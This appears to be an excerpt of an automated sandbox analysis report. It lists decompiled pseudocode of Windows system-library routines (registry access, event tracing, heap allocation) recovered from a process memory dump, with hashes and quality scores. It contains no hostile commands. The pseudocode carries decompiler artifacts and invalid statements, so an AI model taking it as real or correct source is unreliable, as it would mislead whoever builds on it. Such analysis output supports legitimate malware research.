                            			E013103E2(signed int __ecx, signed int __edx) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				char _v52;
                            				char _v56;
                            				char _v64;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t56;
                            				signed int _t58;
                            				char* _t64;
                            				intOrPtr _t65;
                            				signed int _t74;
                            				signed int _t79;
                            				char* _t83;
                            				intOrPtr _t84;
                            				signed int _t93;
                            				signed int _t94;
                            				signed char* _t95;
                            				signed int _t99;
                            				signed int _t100;
                            				signed char* _t101;
                            				signed int _t105;
                            				signed int _t119;
                            				signed int _t120;
                            				void* _t122;
                            				signed int _t123;
                            				signed int _t127;
                            
                            				_v8 =  *0x13dd360 ^ _t127;
                            				_t119 = __ecx;
                            				_t105 = __edx;
                            				_t118 = 0;
                            				_v20 = __edx;
                            				_t120 =  *(__ecx + 0x20);
                            				if(E01310548(__ecx, 0) != 0) {
                            					_t56 = 0xc000022d;
                            					L23:
                            					return E0132B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                            				} else {
                            					_v12 = _v12 | 0xffffffff;
                            					_t58 = _t120 + 0x24;
                            					_t109 =  *(_t120 + 0x18);
                            					_t118 = _t58;
                            					_v16 = _t58;
                            					E012FB02A( *(_t120 + 0x18), _t118, 0x14a5);
                            					_v52 = 0x18;
                            					_v48 = 0;
                            					0x840 = 0x40;
                            					if( *0x13d7c1c != 0) {
                            					}
                            					_v40 = 0x840;
                            					_v44 = _t105;
                            					_v36 = 0;
                            					_v32 = 0;
                            					if(E01307D50() != 0) {
                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					} else {
                            						_t64 = 0x7ffe0384;
                            					}
                            					if( *_t64 != 0) {
                            						_t65 =  *[fs:0x30];
                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                            							_t100 = E01307D50();
                            							__eflags = _t100;
                            							if(_t100 == 0) {
                            								_t101 = 0x7ffe0385;
                            							} else {
                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            							}
                            							__eflags =  *_t101 & 0x00000020;
                            							if(( *_t101 & 0x00000020) != 0) {
                            								_t118 = _t118 | 0xffffffff;
                            								_t109 = 0x1485;
                            								E01367016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                            							}
                            						}
                            					}
                            					_t105 = 0;
                            					while(1) {
                            						_push(0x60);
                            						_push(5);
                            						_push( &_v64);
                            						_push( &_v52);
                            						_push(0x100021);
                            						_push( &_v12);
                            						_t122 = E01329830();
                            						if(_t122 >= 0) {
                            							break;
                            						}
                            						__eflags = _t122 - 0xc0000034;
                            						if(_t122 == 0xc0000034) {
                            							L38:
                            							_t120 = 0xc0000135;
                            							break;
                            						}
                            						__eflags = _t122 - 0xc000003a;
                            						if(_t122 == 0xc000003a) {
                            							goto L38;
                            						}
                            						__eflags = _t122 - 0xc0000022;
                            						if(_t122 != 0xc0000022) {
                            							break;
                            						}
                            						__eflags = _t105;
                            						if(__eflags != 0) {
                            							break;
                            						}
                            						_t109 = _t119;
                            						_t99 = E013669A6(_t119, __eflags);
                            						__eflags = _t99;
                            						if(_t99 == 0) {
                            							break;
                            						}
                            						_t105 = _t105 + 1;
                            					}
                            					if( !_t120 >= 0) {
                            						L22:
                            						_t56 = _t120;
                            						goto L23;
                            					}
                            					if( *0x13d7c04 != 0) {
                            						_t118 = _v12;
                            						_t120 = E0136A7AC(_t119, _t118, _t109);
                            						__eflags = _t120;
                            						if(_t120 >= 0) {
                            							goto L10;
                            						}
                            						__eflags =  *0x13d7bd8;
                            						if( *0x13d7bd8 != 0) {
                            							L20:
                            							if(_v12 != 0xffffffff) {
                            								_push(_v12);
                            								E013295D0();
                            							}
                            							goto L22;
                            						}
                            					}
                            					L10:
                            					_push(_v12);
                            					_t105 = _t119 + 0xc;
                            					_push(0x1000000);
                            					_push(0x10);
                            					_push(0);
                            					_push(0);
                            					_push(0xf);
                            					_push(_t105);
                            					_t120 = E013299A0();
                            					if(_t120 < 0) {
                            						__eflags = _t120 - 0xc000047e;
                            						if(_t120 == 0xc000047e) {
                            							L51:
                            							_t74 = E01363540(_t120);
                            							_t119 = _v16;
                            							_t120 = _t74;
                            							L52:
                            							_t118 = 0x1485;
                            							E012EB1E1(_t120, 0x1485, 0, _t119);
                            							goto L20;
                            						}
                            						__eflags = _t120 - 0xc000047f;
                            						if(_t120 == 0xc000047f) {
                            							goto L51;
                            						}
                            						__eflags = _t120 - 0xc0000462;
                            						if(_t120 == 0xc0000462) {
                            							goto L51;
                            						}
                            						_t119 = _v16;
                            						__eflags = _t120 - 0xc0000017;
                            						if(_t120 != 0xc0000017) {
                            							__eflags = _t120 - 0xc000009a;
                            							if(_t120 != 0xc000009a) {
                            								__eflags = _t120 - 0xc000012d;
                            								if(_t120 != 0xc000012d) {
                            									_v28 = _t119;
                            									_push( &_v56);
                            									_push(1);
                            									_v24 = _t120;
                            									_push( &_v28);
                            									_push(1);
                            									_push(2);
                            									_push(0xc000007b);
                            									_t79 = E0132AAF0();
                            									__eflags = _t79;
                            									if(_t79 >= 0) {
                            										__eflags =  *0x13d8474 - 3;
                            										if( *0x13d8474 != 3) {
                            											 *0x13d79dc =  *0x13d79dc + 1;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						goto L52;
                            					}
                            					if(E01307D50() != 0) {
                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					} else {
                            						_t83 = 0x7ffe0384;
                            					}
                            					if( *_t83 != 0) {
                            						_t84 =  *[fs:0x30];
                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                            							_t94 = E01307D50();
                            							__eflags = _t94;
                            							if(_t94 == 0) {
                            								_t95 = 0x7ffe0385;
                            							} else {
                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            							}
                            							__eflags =  *_t95 & 0x00000020;
                            							if(( *_t95 & 0x00000020) != 0) {
                            								E01367016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                            							}
                            						}
                            					}
                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                            						if( *0x13d8708 != 0) {
                            							_t118 =  *0x7ffe0330;
                            							_t123 =  *0x13d7b00; // 0x0
                            							asm("ror esi, cl");
                            							 *0x13db1e0(_v12, _v20, 0x20);
                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                            							asm("sbb esi, esi");
                            							_t120 =  ~_t50 & _t93;
                            						} else {
                            							_t120 = 0;
                            						}
                            					}
                            					if( !_t120 >= 0) {
                            						L19:
                            						_push( *_t105);
                            						E013295D0();
                            						 *_t105 =  *_t105 & 0x00000000;
                            						goto L20;
                            					}
                            					_t120 = E012F7F65(_t119);
                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                            						__eflags = _t120;
                            						if(_t120 < 0) {
                            							goto L19;
                            						}
                            						 *(_t119 + 0x64) = _v12;
                            						goto L22;
                            					}
                            					goto L19;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa03ca678f2f8f5107a4cb8f5cdf358aaad36cc81cb9fc3e635cb5511454684e
                            • Instruction ID: 7628377cc965bf98f69afc8a049ce0282213dac4597cad5b78a73371fd4d4b6e
                            • Opcode Fuzzy Hash: fa03ca678f2f8f5107a4cb8f5cdf358aaad36cc81cb9fc3e635cb5511454684e
                            • Instruction Fuzzy Hash: B8911931E042599BEB3D9A6CC844FAD7BE4AB05B1CF050265FE50AB2D5EB749C80CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E012EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                            				signed int _v8;
                            				char _v1036;
                            				signed int _v1040;
                            				char _v1048;
                            				signed int _v1052;
                            				signed char _v1056;
                            				void* _v1058;
                            				char _v1060;
                            				signed int _v1064;
                            				void* _v1068;
                            				intOrPtr _v1072;
                            				void* _v1084;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr _t70;
                            				intOrPtr _t72;
                            				signed int _t74;
                            				intOrPtr _t77;
                            				signed int _t78;
                            				signed int _t81;
                            				void* _t101;
                            				signed int _t102;
                            				signed int _t107;
                            				signed int _t109;
                            				signed int _t110;
                            				signed char _t111;
                            				signed int _t112;
                            				signed int _t113;
                            				signed int _t114;
                            				intOrPtr _t116;
                            				void* _t117;
                            				char _t118;
                            				void* _t120;
                            				char _t121;
                            				signed int _t122;
                            				signed int _t123;
                            				signed int _t125;
                            
                            				_t125 = (_t123 & 0xfffffff8) - 0x424;
                            				_v8 =  *0x13dd360 ^ _t125;
                            				_t116 = _a4;
                            				_v1056 = _a16;
                            				_v1040 = _a24;
                            				if(E012F6D30( &_v1048, _a8) < 0) {
                            					L4:
                            					_pop(_t117);
                            					_pop(_t120);
                            					_pop(_t101);
                            					return E0132B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                            				}
                            				_t70 = _a20;
                            				if(_t70 >= 0x3f4) {
                            					_t121 = _t70 + 0xc;
                            					L19:
                            					_t107 =  *( *[fs:0x30] + 0x18);
                            					__eflags = _t107;
                            					if(_t107 == 0) {
                            						L60:
                            						_t68 = 0xc0000017;
                            						goto L4;
                            					}
                            					_t72 =  *0x13d7b9c; // 0x0
                            					_t74 = L01304620(_t107, _t107, _t72 + 0x180000, _t121);
                            					_v1064 = _t74;
                            					__eflags = _t74;
                            					if(_t74 == 0) {
                            						goto L60;
                            					}
                            					_t102 = _t74;
                            					_push( &_v1060);
                            					_push(_t121);
                            					_push(_t74);
                            					_push(2);
                            					_push( &_v1048);
                            					_push(_t116);
                            					_t122 = E01329650();
                            					__eflags = _t122;
                            					if(_t122 >= 0) {
                            						L7:
                            						_t114 = _a12;
                            						__eflags = _t114;
                            						if(_t114 != 0) {
                            							_t77 = _a20;
                            							L26:
                            							_t109 =  *(_t102 + 4);
                            							__eflags = _t109 - 3;
                            							if(_t109 == 3) {
                            								L55:
                            								__eflags = _t114 - _t109;
                            								if(_t114 != _t109) {
                            									L59:
                            									_t122 = 0xc0000024;
                            									L15:
                            									_t78 = _v1052;
                            									__eflags = _t78;
                            									if(_t78 != 0) {
                            										L013077F0( *( *[fs:0x30] + 0x18), 0, _t78);
                            									}
                            									_t68 = _t122;
                            									goto L4;
                            								}
                            								_t110 = _v1056;
                            								_t118 =  *((intOrPtr*)(_t102 + 8));
                            								_v1060 = _t118;
                            								__eflags = _t110;
                            								if(_t110 == 0) {
                            									L10:
                            									_t122 = 0x80000005;
                            									L11:
                            									_t81 = _v1040;
                            									__eflags = _t81;
                            									if(_t81 == 0) {
                            										goto L15;
                            									}
                            									__eflags = _t122;
                            									if(_t122 >= 0) {
                            										L14:
                            										 *_t81 = _t118;
                            										goto L15;
                            									}
                            									__eflags = _t122 - 0x80000005;
                            									if(_t122 != 0x80000005) {
                            										goto L15;
                            									}
                            									goto L14;
                            								}
                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                            									goto L10;
                            								}
                            								_push( *((intOrPtr*)(_t102 + 8)));
                            								_t59 = _t102 + 0xc; // 0xc
                            								_push(_t110);
                            								L54:
                            								E0132F3E0();
                            								_t125 = _t125 + 0xc;
                            								goto L11;
                            							}
                            							__eflags = _t109 - 7;
                            							if(_t109 == 7) {
                            								goto L55;
                            							}
                            							_t118 = 4;
                            							__eflags = _t109 - _t118;
                            							if(_t109 != _t118) {
                            								__eflags = _t109 - 0xb;
                            								if(_t109 != 0xb) {
                            									__eflags = _t109 - 1;
                            									if(_t109 == 1) {
                            										__eflags = _t114 - _t118;
                            										if(_t114 != _t118) {
                            											_t118 =  *((intOrPtr*)(_t102 + 8));
                            											_v1060 = _t118;
                            											__eflags = _t118 - _t77;
                            											if(_t118 > _t77) {
                            												goto L10;
                            											}
                            											_push(_t118);
                            											_t56 = _t102 + 0xc; // 0xc
                            											_push(_v1056);
                            											goto L54;
                            										}
                            										__eflags = _t77 - _t118;
                            										if(_t77 != _t118) {
                            											L34:
                            											_t122 = 0xc0000004;
                            											goto L15;
                            										}
                            										_t111 = _v1056;
                            										__eflags = _t111 & 0x00000003;
                            										if((_t111 & 0x00000003) == 0) {
                            											_v1060 = _t118;
                            											__eflags = _t111;
                            											if(__eflags == 0) {
                            												goto L10;
                            											}
                            											_t42 = _t102 + 0xc; // 0xc
                            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                            											_v1048 =  *((intOrPtr*)(_t102 + 8));
                            											_push(_t111);
                            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                            											_push(0);
                            											_push( &_v1048);
                            											_t122 = E013213C0(_t102, _t118, _t122, __eflags);
                            											L44:
                            											_t118 = _v1072;
                            											goto L11;
                            										}
                            										_t122 = 0x80000002;
                            										goto L15;
                            									}
                            									_t122 = 0xc0000024;
                            									goto L44;
                            								}
                            								__eflags = _t114 - _t109;
                            								if(_t114 != _t109) {
                            									goto L59;
                            								}
                            								_t118 = 8;
                            								__eflags = _t77 - _t118;
                            								if(_t77 != _t118) {
                            									goto L34;
                            								}
                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                            									goto L34;
                            								}
                            								_t112 = _v1056;
                            								_v1060 = _t118;
                            								__eflags = _t112;
                            								if(_t112 == 0) {
                            									goto L10;
                            								}
                            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                            								goto L11;
                            							}
                            							__eflags = _t114 - _t118;
                            							if(_t114 != _t118) {
                            								goto L59;
                            							}
                            							__eflags = _t77 - _t118;
                            							if(_t77 != _t118) {
                            								goto L34;
                            							}
                            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                            								goto L34;
                            							}
                            							_t113 = _v1056;
                            							_v1060 = _t118;
                            							__eflags = _t113;
                            							if(_t113 == 0) {
                            								goto L10;
                            							}
                            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                            							goto L11;
                            						}
                            						_t118 =  *((intOrPtr*)(_t102 + 8));
                            						__eflags = _t118 - _a20;
                            						if(_t118 <= _a20) {
                            							_t114 =  *(_t102 + 4);
                            							_t77 = _t118;
                            							goto L26;
                            						}
                            						_v1060 = _t118;
                            						goto L10;
                            					}
                            					__eflags = _t122 - 0x80000005;
                            					if(_t122 != 0x80000005) {
                            						goto L15;
                            					}
                            					L013077F0( *( *[fs:0x30] + 0x18), 0, _t102);
                            					L18:
                            					_t121 = _v1060;
                            					goto L19;
                            				}
                            				_push( &_v1060);
                            				_push(0x400);
                            				_t102 =  &_v1036;
                            				_push(_t102);
                            				_push(2);
                            				_push( &_v1048);
                            				_push(_t116);
                            				_t122 = E01329650();
                            				if(_t122 >= 0) {
                            					__eflags = 0;
                            					_v1052 = 0;
                            					goto L7;
                            				}
                            				if(_t122 == 0x80000005) {
                            					goto L18;
                            				}
                            				goto L4;
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c554ff4480e520aea116c9204c28cf3b07a6fea72097bb563c8ceca73b4517a
                            • Instruction ID: f0e9d3e5841765607a8d78eec561a51fb6d822d6c6f8554e104d1341846fdb9a
                            • Opcode Fuzzy Hash: 6c554ff4480e520aea116c9204c28cf3b07a6fea72097bb563c8ceca73b4517a
                            • Instruction Fuzzy Hash: 7B81B2756142468FEB66CE58C880E3B77E9FB84B58F54482EEE459B341D330ED41CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 39%
                            			E0137B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _t80;
                            				signed int _t83;
                            				intOrPtr _t89;
                            				signed int _t92;
                            				signed char _t106;
                            				signed int* _t107;
                            				intOrPtr _t108;
                            				intOrPtr _t109;
                            				signed int _t114;
                            				void* _t115;
                            				void* _t117;
                            				void* _t119;
                            				void* _t122;
                            				signed int _t123;
                            				signed int* _t124;
                            
                            				_t106 = _a12;
                            				if((_t106 & 0xfffffffc) != 0) {
                            					return 0xc000000d;
                            				}
                            				if((_t106 & 0x00000002) != 0) {
                            					_t106 = _t106 | 0x00000001;
                            				}
                            				_t109 =  *0x13d7b9c; // 0x0
                            				_t124 = L01304620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                            				if(_t124 != 0) {
                            					 *_t124 =  *_t124 & 0x00000000;
                            					_t124[1] = _t124[1] & 0x00000000;
                            					_t124[4] = _t124[4] & 0x00000000;
                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                            						L13:
                            						_push(_t124);
                            						if((_t106 & 0x00000002) != 0) {
                            							_push(0x200);
                            							_push(0x28);
                            							_push(0xffffffff);
                            							_t122 = E01329800();
                            							if(_t122 < 0) {
                            								L33:
                            								if((_t124[4] & 0x00000001) != 0) {
                            									_push(4);
                            									_t64 =  &(_t124[1]); // 0x4
                            									_t107 = _t64;
                            									_push(_t107);
                            									_push(5);
                            									_push(0xfffffffe);
                            									E013295B0();
                            									if( *_t107 != 0) {
                            										_push( *_t107);
                            										E013295D0();
                            									}
                            								}
                            								_push(_t124);
                            								_push(0);
                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                            								L37:
                            								L013077F0();
                            								return _t122;
                            							}
                            							_t124[4] = _t124[4] | 0x00000002;
                            							L18:
                            							_t108 = _a8;
                            							_t29 =  &(_t124[0x105]); // 0x414
                            							_t80 = _t29;
                            							_t30 =  &(_t124[5]); // 0x14
                            							_t124[3] = _t80;
                            							_t123 = 0;
                            							_t124[2] = _t30;
                            							 *_t80 = _t108;
                            							if(_t108 == 0) {
                            								L21:
                            								_t112 = 0x400;
                            								_push( &_v8);
                            								_v8 = 0x400;
                            								_push(_t124[2]);
                            								_push(0x400);
                            								_push(_t124[3]);
                            								_push(0);
                            								_push( *_t124);
                            								_t122 = E01329910();
                            								if(_t122 != 0xc0000023) {
                            									L26:
                            									if(_t122 != 0x106) {
                            										L40:
                            										if(_t122 < 0) {
                            											L29:
                            											_t83 = _t124[2];
                            											if(_t83 != 0) {
                            												_t59 =  &(_t124[5]); // 0x14
                            												if(_t83 != _t59) {
                            													L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                            												}
                            											}
                            											_push( *_t124);
                            											E013295D0();
                            											goto L33;
                            										}
                            										 *_a16 = _t124;
                            										return 0;
                            									}
                            									if(_t108 != 1) {
                            										_t122 = 0;
                            										goto L40;
                            									}
                            									_t122 = 0xc0000061;
                            									goto L29;
                            								} else {
                            									goto L22;
                            								}
                            								while(1) {
                            									L22:
                            									_t89 =  *0x13d7b9c; // 0x0
                            									_t92 = L01304620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                            									_t124[2] = _t92;
                            									if(_t92 == 0) {
                            										break;
                            									}
                            									_t112 =  &_v8;
                            									_push( &_v8);
                            									_push(_t92);
                            									_push(_v8);
                            									_push(_t124[3]);
                            									_push(0);
                            									_push( *_t124);
                            									_t122 = E01329910();
                            									if(_t122 != 0xc0000023) {
                            										goto L26;
                            									}
                            									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                            								}
                            								_t122 = 0xc0000017;
                            								goto L26;
                            							}
                            							_t119 = 0;
                            							do {
                            								_t114 = _t124[3];
                            								_t119 = _t119 + 0xc;
                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                            								_t123 = _t123 + 1;
                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                            							} while (_t123 < _t108);
                            							goto L21;
                            						}
                            						_push(0x28);
                            						_push(3);
                            						_t122 = E012EA7B0();
                            						if(_t122 < 0) {
                            							goto L33;
                            						}
                            						_t124[4] = _t124[4] | 0x00000001;
                            						goto L18;
                            					}
                            					if((_t106 & 0x00000001) == 0) {
                            						_t115 = 0x28;
                            						_t122 = E0137E7D3(_t115, _t124);
                            						if(_t122 < 0) {
                            							L9:
                            							_push(_t124);
                            							_push(0);
                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                            							goto L37;
                            						}
                            						L12:
                            						if( *_t124 != 0) {
                            							goto L18;
                            						}
                            						goto L13;
                            					}
                            					_t15 =  &(_t124[1]); // 0x4
                            					_t117 = 4;
                            					_t122 = E0137E7D3(_t117, _t15);
                            					if(_t122 >= 0) {
                            						_t124[4] = _t124[4] | 0x00000001;
                            						_v12 = _v12 & 0x00000000;
                            						_push(4);
                            						_push( &_v12);
                            						_push(5);
                            						_push(0xfffffffe);
                            						E013295B0();
                            						goto L12;
                            					}
                            					goto L9;
                            				} else {
                            					return 0xc0000017;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb83c23022e50bb855258abd7782a63aa754fe1053555640145a981d4eb1383f
                            • Instruction ID: ab8158d9f53ee093e07578c113fdae74aa116319f161e4d99aa93c60d6eab30d
                            • Opcode Fuzzy Hash: eb83c23022e50bb855258abd7782a63aa754fe1053555640145a981d4eb1383f
                            • Instruction Fuzzy Hash: 7071EE32200706EFE732EF18C844F66BBF5EF44728F244528E6659B6A4DB79E941CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E01366DC9(signed int __ecx, void* __edx) {
                            				unsigned int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				void* _t87;
                            				void* _t95;
                            				signed char* _t96;
                            				signed int _t107;
                            				signed int _t136;
                            				signed char* _t137;
                            				void* _t157;
                            				void* _t161;
                            				void* _t167;
                            				intOrPtr _t168;
                            				void* _t174;
                            				void* _t175;
                            				signed int _t176;
                            				void* _t177;
                            
                            				_t136 = __ecx;
                            				_v44 = 0;
                            				_t167 = __edx;
                            				_v40 = 0;
                            				_v36 = 0;
                            				_v32 = 0;
                            				_v60 = 0;
                            				_v56 = 0;
                            				_v52 = 0;
                            				_v48 = 0;
                            				_v16 = __ecx;
                            				_t87 = L01304620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                            				_t175 = _t87;
                            				if(_t175 != 0) {
                            					_t11 = _t175 + 0x30; // 0x30
                            					 *((short*)(_t175 + 6)) = 0x14d4;
                            					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                            					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                            					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                            					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                            					E01366B4C(_t167, _t11, 0x214,  &_v8);
                            					_v12 = _v8 + 0x10;
                            					_t95 = E01307D50();
                            					_t137 = 0x7ffe0384;
                            					if(_t95 == 0) {
                            						_t96 = 0x7ffe0384;
                            					} else {
                            						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					}
                            					_push(_t175);
                            					_push(_v12);
                            					_push(0x402);
                            					_push( *_t96 & 0x000000ff);
                            					E01329AE0();
                            					_t87 = L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                            					_t176 = _v16;
                            					if((_t176 & 0x00000100) != 0) {
                            						_push( &_v36);
                            						_t157 = 4;
                            						_t87 = E0136795D( *((intOrPtr*)(_t167 + 8)), _t157);
                            						if(_t87 >= 0) {
                            							_v24 = E0136795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                            							_v28 = E0136795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                            							_push( &_v52);
                            							_t161 = 5;
                            							_t168 = E0136795D( *((intOrPtr*)(_t167 + 8)), _t161);
                            							_v20 = _t168;
                            							_t107 = L01304620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                            							_v16 = _t107;
                            							if(_t107 != 0) {
                            								_v8 = _v8 & 0x00000000;
                            								 *(_t107 + 0x20) = _t176;
                            								 *((short*)(_t107 + 6)) = 0x14d5;
                            								_t47 = _t107 + 0x24; // 0x24
                            								_t177 = _t47;
                            								E01366B4C( &_v36, _t177, 0xc78,  &_v8);
                            								_t51 = _v8 + 4; // 0x4
                            								_t178 = _t177 + (_v8 >> 1) * 2;
                            								_v12 = _t51;
                            								E01366B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                            								_v12 = _v12 + _v8;
                            								E01366B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                            								_t125 = _v8;
                            								_v12 = _v12 + _v8;
                            								E01366B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                            								_t174 = _v12 + _v8;
                            								if(E01307D50() != 0) {
                            									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            								}
                            								_push(_v16);
                            								_push(_t174);
                            								_push(0x402);
                            								_push( *_t137 & 0x000000ff);
                            								E01329AE0();
                            								L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                            								_t168 = _v20;
                            							}
                            							_t87 = L01302400( &_v36);
                            							if(_v24 >= 0) {
                            								_t87 = L01302400( &_v44);
                            							}
                            							if(_t168 >= 0) {
                            								_t87 = L01302400( &_v52);
                            							}
                            							if(_v28 >= 0) {
                            								return L01302400( &_v60);
                            							}
                            						}
                            					}
                            				}
                            				return _t87;
                            			}
































                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                            • Instruction ID: 22b8f1797f17e46f869c97c766c1715c758f41682b8dff6a8b0f44e307863380
                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                            • Instruction Fuzzy Hash: DC719F71E00219EFDB11DFA9C984AEEBBF8FF48758F104069E504E7290DB30AA45CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cd1af06d0348872e922e0b83e43cdcb11349b7e6ad3179d5504ca6512094e17b
                            • Instruction ID: 1552426ad6833692612968701b38d111221d590e21ca327859714effd5dd886e
                            • Opcode Fuzzy Hash: cd1af06d0348872e922e0b83e43cdcb11349b7e6ad3179d5504ca6512094e17b
                            • Instruction Fuzzy Hash: 0951DE71225742ABD322EF68C845B27BBE4FF50718F14092EF69587651E770F844CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a94304bbfcf89413f69f5f07039c663d17cd5b14891cbdd2225a5157ca0aee5b
                            • Instruction ID: 76a15838fae7d0a26ae4c191ad7157f847cc1b17bc6d190d169bb9476268bd0b
                            • Opcode Fuzzy Hash: a94304bbfcf89413f69f5f07039c663d17cd5b14891cbdd2225a5157ca0aee5b
                            • Instruction Fuzzy Hash: B351E3B6A00115CFCB18CF1DD4909BEB7B5FB88704725C45AE8569B768D730AA51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c2bc14f03dab8f17383c344fef1b1b7d95c9936d021a8bfa5730744e9752623
                            • Instruction ID: 64ad36791d7241ebb7ecaa79d806e273349544fea92cd4202d17e8f5c7487ebb
